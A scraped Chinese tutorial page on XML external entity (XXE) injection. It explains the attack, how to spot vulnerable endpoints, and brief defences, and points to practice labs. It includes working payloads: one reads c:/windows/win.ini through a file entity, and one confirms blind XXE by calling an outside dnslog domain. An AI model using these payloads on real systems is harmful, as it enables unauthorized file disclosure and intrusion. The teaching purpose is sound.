当前位置: 首页 > news >正文

网站建设平台赚钱跨平台app开发工具

网站建设平台赚钱,跨平台app开发工具,东莞南城网站建设,四川建设网有限责任公司官网一、概述 1、XXE:XML外部实体注入攻击 2、XML:可扩展标记语言。 (1)没有固定标签,所有标签都可以自定义,但有限制规则。 (2)用于数据对的传输与存储,常被用于充当配置文件 推荐教程:XML 教程 (3)后缀…

一、概述

1、XXE:XML外部实体注入攻击

2、XML:可扩展标记语言。

(1)没有固定标签,所有标签都可以自定义,但有限制规则。

(2)用于数据对的传输与存储,常被用于充当配置文件

推荐教程:XML 教程

(3)后缀名:*.xml

(4)语法规则:格式正确完整

3、XXE攻击原理:攻击者通过恶意的外部实体,当解析者解析包含恶意外部实体且未对其进行过滤,造成命令执行,目录遍历。

二、利用

1、存在:

  • 看URL是.ashx后缀
  • 存在明显的XML标签
  • 是POST请求,content-type:application/xml、text/xml、application/json(发现更改为application/xml看看)

2、限制条件:是否开启外部实体解析

3、攻击方式:有回显和无回显(盲攻击)

4、Payload:

#尝试,判断漏洞存在
<?xml version="1.0"?>
<!DOCTYPE info [
<!ENTITY xxe "你好" > ]>
<info>&xxe;</info>
#利用
<?xml version="1.0" encoding="utf-8" ?>
<!DOCTYPE foo [
<!ENTITY xxe SYSTEM
"file:///c:/windows/win.ini" >
]>
<foo>&xxe;</foo>

5、利用dnslog判断是否存在xxe漏洞(靶场pikachu-xxe漏洞)

(1)、修改payload

<?xml version="1.0" encoding="utf-8" ?>
<!DOCTYPE info [
<!ENTITY xxe SYSTEM
"http://dnslog.cn暂时域名" >
]>
<info>&xxe;</info>

(2)、回到dnslog网址看是否有域名解析了

6、练习(ctf题目):http://web.jarvisoj.com:9882/

7、思路

  • 无回显,BP抓包
  • 判断是否存在xxe漏洞
  • 深度利用

三、补充

1、工具:XXE injector

资料:https://www.cnblogs.com/AgainKjh/p/14639186.html

2、防御

  • 升级版本,禁止外部实体解析
  • 过滤用户提交的数据
http://www.yayakq.cn/news/252151/

相关文章:

  • 织梦 网站搬家建设公司logo
  • dedecms调取友情链接 网站类型建设农业网站
  • 深圳建设网站排名做行政关注什么类型的网站
  • 如何把网站推广出题库制作助手app
  • 重庆网站模板建站网站个性化制作
  • 太原提高网站排名php网站开发试卷
  • 台州企业建站系统郝友做的网站
  • 上海柘中建设股份有限公司网站做网站能创业吗
  • 莱芜高端网站设计建设宁波网站优化体验
  • 怎样让百度搜索到自己的网站信息推广服务
  • 个人做二次元网站怎么赚钱建行互联网站
  • 江苏网站建设哪家好文字生成器在线制作
  • 沙河做网站培训课程网站
  • 网站空间文件删不掉彩虹网站建设
  • 字体分辨网站项目管理软件系统
  • 门户网站的基本特征有个人是否可以申请网址
  • 网站开发的软件支持温州百度关键词搜索
  • 如何知道网站什么时候做的网站建设众包平台
  • 网站定位与功能分析网站快速排名服务商
  • 站长平台社区网站5g空间多少钱
  • 地方旅游网站建设必要性wordpress ad
  • 2018年网站优化怎么做深圳建科院公司网站
  • 瑞安市住房和城乡规划建设局网站网站开发团队人员配置
  • 怎么开网站做网红网站商品图片怎么做
  • 设计公司网站域名巴中做网站公司
  • 如何做网站的关键词北京集团公司网站建设
  • 零基础学做网站难吗自己做的个人网站无法备案
  • 下载软件网站微信商城系统哪找
  • wordpress建站全过程软件售卖平台
  • 兰州新站seo网站建设捌金手指花总十六